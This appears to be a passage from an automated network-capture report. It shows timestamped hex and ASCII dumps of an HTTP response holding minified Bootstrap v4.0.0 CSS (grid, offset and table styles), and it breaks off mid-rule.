                                                                                                                                                                                2021-10-25 16:17:23 UTC42INData Raw: 37 62 66 38 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                                                                                                                                                                                Data Ascii: 7bf8/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                                                                                                                                                                                2021-10-25 16:17:23 UTC43INData Raw: 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f
                                                                                                                                                                                Data Ascii: yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpo
                                                                                                                                                                                2021-10-25 16:17:23 UTC44INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69
                                                                                                                                                                                Data Ascii: argin-top:0;margin-bottom:1rem}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:i
                                                                                                                                                                                2021-10-25 16:17:23 UTC45INData Raw: 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c
                                                                                                                                                                                Data Ascii: abel{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,
                                                                                                                                                                                2021-10-25 16:17:23 UTC47INData Raw: 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69
                                                                                                                                                                                Data Ascii: rsor:pointer}template{display:none}[hidden]{display:none!important}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-si
                                                                                                                                                                                2021-10-25 16:17:23 UTC48INData Raw: 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 30 25 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61
                                                                                                                                                                                Data Ascii: block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:90%;color:#6c757d}code,kbd,pre,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}code{font-size:87.5%;color:#e83e8c;word-break:brea
                                                                                                                                                                                2021-10-25 16:17:23 UTC49INData Raw: 2e 63 6f 6c 2d 6c 67 2d 31 31 2c 2e 63 6f 6c 2d 6c 67 2d 31 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 2c 2e 63 6f 6c 2d 6c 67 2d 33 2c 2e 63 6f 6c 2d 6c 67 2d 34 2c 2e 63 6f 6c 2d 6c 67 2d 35 2c 2e 63 6f 6c 2d 6c 67 2d 36 2c 2e 63 6f 6c 2d 6c 67 2d 37 2c 2e 63 6f 6c 2d 6c 67 2d 38 2c 2e 63 6f 6c 2d 6c 67 2d 39 2c 2e 63 6f 6c 2d 6c 67 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 6d 64 2c 2e 63 6f 6c 2d 6d 64 2d 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 30 2c 2e 63 6f 6c 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61
                                                                                                                                                                                Data Ascii: .col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-a
                                                                                                                                                                                2021-10-25 16:17:23 UTC51INData Raw: 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33
                                                                                                                                                                                Data Ascii: 33333%;flex:0 0 58.333333%;max-width:58.333333%}.col-8{-webkit-box-flex:0;-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333
                                                                                                                                                                                2021-10-25 16:17:23 UTC52INData Raw: 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 33 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 32 3b 6f 72 64 65 72 3a 31 32 7d 2e 6f 66 66 73 65 74 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65
                                                                                                                                                                                Data Ascii: bkit-box-ordinal-group:13;-ms-flex-order:12;order:12}.offset-1{margin-left:8.333333%}.offset-2{margin-left:16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-le
                                                                                                                                                                                2021-10-25 16:17:23 UTC53INData Raw: 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b
                                                                                                                                                                                Data Ascii: 0 0 75%;flex:0 0 75%;max-width:75%}.col-sm-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;
                                                                                                                                                                                2021-10-25 16:17:23 UTC55INData Raw: 65 74 2d 73 6d 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65
                                                                                                                                                                                Data Ascii: et-sm-2{margin-left:16.666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.333333%}.offset-sm-5{margin-left:41.666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.333333%}.offset-sm-8{margin-left:66.666667%}.offset-sm-9{margin-le
                                                                                                                                                                                2021-10-25 16:17:23 UTC56INData Raw: 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6d 64 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6d 64 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 6d 64 2d 66 69
                                                                                                                                                                                Data Ascii: lex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-md-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-md-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-md-fi
                                                                                                                                                                                2021-10-25 16:17:23 UTC57INData Raw: 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 31 7b 6d
                                                                                                                                                                                Data Ascii: }.offset-md-4{margin-left:33.333333%}.offset-md-5{margin-left:41.666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.333333%}.offset-md-8{margin-left:66.666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.333333%}.offset-md-11{m
                                                                                                                                                                                2021-10-25 16:17:23 UTC59INData Raw: 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 6c 67 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 6c 67 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d
                                                                                                                                                                                Data Ascii: :83.333333%}.col-lg-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-lg-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-lg-first{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}
                                                                                                                                                                                2021-10-25 16:17:23 UTC60INData Raw: 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 6c 67 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 63 6f 6c 2d 78 6c 7b 2d 6d
                                                                                                                                                                                Data Ascii: ft:41.666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.333333%}.offset-lg-8{margin-left:66.666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.333333%}.offset-lg-11{margin-left:91.666667%}}@media (min-width:1200px){.col-xl{-m
                                                                                                                                                                                2021-10-25 16:17:23 UTC61INData Raw: 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 78 6c 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 78 6c 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 78 6c 2d 6c 61 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 34 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72
                                                                                                                                                                                Data Ascii: 666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-xl-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-xl-first{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.order-xl-last{-webkit-box-ordinal-group:14;-ms-flex-order
                                                                                                                                                                                2021-10-25 16:17:23 UTC63INData Raw: 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 78 6c 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 78 6c 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 78 6c 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 78 6c 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 2e 74 61 62 6c 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 74 61 62 6c 65 20 74 64 2c 2e 74 61
                                                                                                                                                                                Data Ascii: rgin-left:58.333333%}.offset-xl-8{margin-left:66.666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.333333%}.offset-xl-11{margin-left:91.666667%}}.table{width:100%;max-width:100%;margin-bottom:1rem;background-color:transparent}.table td,.ta
                                                                                                                                                                                2021-10-25 16:17:23 UTC64INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 33 65 36 63 62 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 31 64 66 62 62 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 3e 74 64 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 31 64 66 62 62 7d 2e 74 61 62 6c 65 2d 69 6e 66 6f 2c 2e 74 61 62 6c 65 2d 69 6e 66 6f 3e 74 64 2c 2e 74 61 62 6c 65 2d 69 6e 66 6f 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 65 65 35 65 62 7d 2e 74 61 62 6c 65 2d 68 6f 76
                                                                                                                                                                                Data Ascii: round-color:#c3e6cb}.table-hover .table-success:hover{background-color:#b1dfbb}.table-hover .table-success:hover>td,.table-hover .table-success:hover>th{background-color:#b1dfbb}.table-info,.table-info>td,.table-info>th{background-color:#bee5eb}.table-hov
                                                                                                                                                                                2021-10-25 16:17:23 UTC65INData Raw: 2c 2e 30 37 35 29 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 61 63 74 69 76 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 35 29 7d 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 61 63 74 69 76 65 3a 68 6f 76 65 72 3e 74 64 2c 2e 74 61 62 6c 65 2d 68 6f 76 65 72 20 2e 74 61 62 6c 65 2d 61 63 74 69 76 65 3a 68 6f 76 65 72 3e 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 35 29 7d 2e 74 61 62 6c 65 20 2e 74 68 65 61 64 2d 64 61 72 6b 20 74 68 7b 63 6f 6c 6f 72 3a 23 66 66 66 